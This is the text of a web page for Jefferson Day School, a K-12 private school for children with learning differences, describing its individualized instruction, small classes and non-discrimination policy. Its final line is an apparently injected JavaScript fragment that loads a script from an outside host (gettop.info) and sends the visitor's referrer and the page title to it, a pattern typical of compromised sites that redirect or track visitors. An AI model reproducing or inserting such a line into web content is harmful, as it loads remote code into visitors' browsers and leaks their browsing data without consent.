A private, independent school for grades K-12, Jefferson Day School is dedicated to the education of children with atypical learning styles. JDS serves students who learn differently or have other disabilities that impact academic or social performance. Our goal is to help each child discover, appreciate, and utilize his or her strengths to build self-confidence and to acquire the academic and social skills needed to succeed.
JDS alternative teaching methods or traditional education provide the key to unlock the potential for each student to become all that he/she can be:
- Unique comprehensive customized curriculum
- Individualized instruction that is personalized allowing each student to:Small multi-aged class size: 4:1 student:teacher ratio within a nurturing environment; each student competes against him/herself.
- learn at his/her own pace
- master concepts/skills according to one’s own learning style
- Non-threatening atmosphere where “It’s OK to be me even though I learn differently!” (Male student age 10)
Jefferson Day School is committed to providing an inclusive and welcoming environment for all members of our community. JDS does not discriminate in offering access to its educational programs based upon race, color, gender, national origin, age, religion, or creed.
Learning knows no boundaries at Jefferson Day School!
s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;